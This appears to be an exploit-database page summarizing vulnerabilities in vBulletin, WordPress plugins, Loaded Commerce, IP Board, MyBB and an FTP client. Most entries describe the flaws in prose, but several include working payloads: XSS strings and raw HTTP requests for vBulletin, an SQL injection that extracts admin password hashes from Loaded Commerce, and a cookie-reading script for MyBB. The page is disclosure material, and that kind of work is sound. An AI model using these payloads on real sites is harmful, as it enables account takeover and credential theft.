
Explore Vulnerabilities


Explore all Exploits:

vBulletin 5.1.X – Cross Site Scripting

The latest vBulletin forum software suffers from a persistent cross site scripting vulnerability, which most likely can be used against every user, including the administrator. The vulnerability is located on the user profile page and is executed whenever someone visits it. Solution: proper filtering of the image title value, in this case the POST title_13 parameter.

The first step to reproduce the vulnerability is to create a user account. Then visit the profile of the victim; let's take the following address as an example: http://vbulletin/member/2-victim. Click 'Share photo' (camera icon) and pick any image you like. You may add a comment about the photo; all you need to do is add a JS payload. As the comment, use something like:

huh" onmouseover=alert(666) xss="

Request:

POST /ajax/render/editor_gallery_photoblock HTTP/1.1
Host: vbulletin

photocount=1&photos%5B0%5D%5Bfiledataid%5D=13&photos%5B0%5D%5Btitle%5D=cool%22+onmouseover%3Dalert(666)+xssed%3D%22&securitytoken=[TOKEN]

Send the image by clicking on the 'Post' button. Request:

POST /create-content/gallery HTTP/1.1
Host: vbulletin
Content-Type: multipart/form-data; boundary=---------------------------18897880557155952661558219659
Content-Length: 1558

-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="securitytoken"

1409922799-a28bf50b7ee16f6bfc2b7c652946c366e25574d5
-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="text"

-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="files"; filename=""
Content-Type: application/octet-stream

-----------------------------18897880557155952661558219659
Content-Disposition: form-data; name="uploadFrom"

-----------------------------1889788055715595266155821

Visit the profile of the victim, and you will see that the XSS is triggered.

WordPress acento theme Arbitrary File Download Vulnerability

A vulnerability in the WordPress acento theme allows an attacker to download any file from the target server. The vulnerability exists due to insufficient validation of user-supplied input in the 'file' parameter of the 'view-pdf.php' script. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable script. This will allow the attacker to download any file from the target server.

Bulk Delete Users by Email, WordPress Plugin 1.0 – CSRF

This plugin allows an administrator to delete user accounts by entering their email address. By forcing the administrator to send a POST request to the URL http://localhost/blog/wp-admin/admin.php?page=bulk-delete-users-by-email/plugin.php with the request body de-text=<victim email>&submit=Search+and+Delete, the user with the given email address will be deleted.

WordPress Like Dislike Counter Plugin SQL Injection Vulnerability

A SQL injection vulnerability exists in the Wordpress Like Dislike Counter Plugin, versions 1.2.3 and below. The vulnerability is due to insufficient sanitization of user-supplied input to the 'post_id' and 'up_type' parameters of the 'ajax_counter.php' script. An attacker can exploit this vulnerability to inject and execute arbitrary SQL commands in the application's back-end database.

LoadedCommerce7 Systemic Query Factory Vulnerability

Loaded Commerce 7 shopping cart/online store suffers from a systemic vulnerability in its query factory, allowing attackers to circumvent user input sanitizing to perform remote SQL injection. With a valid customer account, create a new contact in your address book using the following values:

First name: :entry_lastname
Last Name: ,(select user_name from lc_administrators order by id asc limit 1),(select user_password from lc_administrators order by id asc limit 1),3,4,5,6,7,8,9,10)#

The new contact will be added to your address book with the admin hash as the contact's street address.

IP Board 3.x CSRF – Token hijacking

IP Board 3.x versions suffer from a vulnerability which allows an attacker to steal the CSRF token of a specific user. The function which allows users to share forum links does not properly sanitize user input. The token is attached to the request as a GET parameter, so it can be obtained if the user is redirected to an evil domain. Using the token, it is possible to perform various operations, as demonstrated in the attached video.

BulletProof FTP Client 2010 – Buffer Overflow (SEH) Exploit

A buffer overflow vulnerability exists in BulletProof FTP Client 2010, which could allow an attacker to execute arbitrary code on the vulnerable system. The vulnerability is due to a boundary error when handling specially crafted Session-File (.bps) files. By convincing a user to open a specially crafted Session-File, an attacker could overflow a buffer and execute arbitrary code on the system with the privileges of the user.

User Social Networks MyBB Plugin 1.2 – Cross Site Scripting

This plugin allows you to add social networks, or related services, to user profiles. The information is shown in the user profile and is visible to anyone who views the profile.

Proof of Concept:
1. Log in to your account.
2. Go to the 'Edit Profile' page at '/usercp.php?action=profile'.
3. Update your Social Network ID with '><script>alert(document.cookie)</script><'
4. The result can be seen in multiple places, including your profile page.

The script will be executed whenever anyone views your profile. The result can also be seen in threads you are involved in if the administrator configures this plugin to allow users' social site information to be published in every post.

WordPress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability

A vulnerability in the Wordpress Plugins Premium Gallery Manager allows an unauthenticated user to access the configuration of the plugin. This can be exploited by sending a POST request to the ajax.php file with the action set to 'save' and the values set to the desired configuration. This can be used to set the admin email, allow users to register, and set the default role to administrator.
